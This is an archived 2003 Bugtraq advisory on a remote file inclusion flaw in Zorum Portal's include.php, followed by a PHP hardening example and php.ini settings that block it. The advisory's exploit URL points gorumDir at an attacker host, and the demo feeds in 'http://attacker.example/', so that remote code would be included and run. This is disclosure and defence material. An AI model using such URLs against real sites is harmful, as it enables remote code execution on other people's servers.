A patch has been created for this hole and can be found on http://www.phpsecure.org/.

>From: MGhz <magasat_private>
>To: bugtraqat_private
>Subject: Zorum Portal (PHP)
>Date: 22 Jan 2003 19:45:26 -0000
>
>
>Version : 3.0;3.1;3.2
>Website : http://zorum.phpoutsourcing.com/
>Problem : Include file
>
>
>File:
>---------------------------------
>include.php
>---------------------------------
>
>PHP Code:
>---------------------------------
>[...]
>include("$gorumDir/generformlib_multipleselection.php");
>include("$gorumDir/generformlib_groupselection.php");
>include("$gorumDir/generformlib_filebutton.php");
>include("$gorumDir/group.php");
>[...]
>---------------------------------
>
>Exploit :
>---------------------------------
>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>-->
>include http://[attacker]/group.php on remote server
>---------------------------------
>
>--
>magasat_private
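
The include pattern reported above, with one way to harden it, as an added example (not Zorum's code and not the phpsecure.org patch). The helper names `tainted_path_vars` and `library_path`, the temporary directory and the request array are assumptions made for the demonstration.

```php
<?php
// Added example: not Zorum's code and not the phpsecure.org patch.
// Assumption: include.php should only ever load files from one fixed directory.
// Vulnerable pattern from the advisory: include("$gorumDir/group.php"); where
// $gorumDir is never assigned in the file, so register_globals fills it from the URL.

/** Request parameter names that collide with internal path variables. */
function tainted_path_vars(array $request, array $internal = ['gorumDir']): array
{
    return array_values(array_intersect(array_keys($request), $internal));
}

/** Resolve $file under $baseDir; refuse stream wrappers and directory escapes. */
function library_path(string $baseDir, string $file): string
{
    foreach ([$baseDir, $file] as $part) {
        if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $part)) {
            throw new InvalidArgumentException('URL/stream wrapper in include path');
        }
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    // realpath() is false for missing files and collapses "../" sequences.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("refusing include outside library dir: $file");
    }
    return $path;
}

// Constructed demo: temporary library directory and a constructed request array.
$gorumDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gorum_demo_' . getmypid();
if (!is_dir($gorumDir)) {
    mkdir($gorumDir);
}
file_put_contents($gorumDir . '/group.php', "<?php return 'group.php loaded';");
$request = ['gorumDir' => 'http://attacker.example/'];

foreach (tainted_path_vars($request) as $name) {
    echo "ignored request-supplied \$$name\n";
}
$loaded = include library_path($gorumDir, 'group.php');   // fixed, server-side base
echo $loaded, "\n";
try {
    library_path($request['gorumDir'], 'group.php');      // what the old code trusted
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
```

The code-level check is a second layer: `register_globals` and `allow_url_fopen` (and, from PHP 5.2.0, `allow_url_include`) should also be off in php.ini so a request can neither populate `$gorumDir` nor make `include` fetch a URL.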
This archive was generated by hypermail 2b30 : Mon Jan 27 2003 - 08:57:28 PST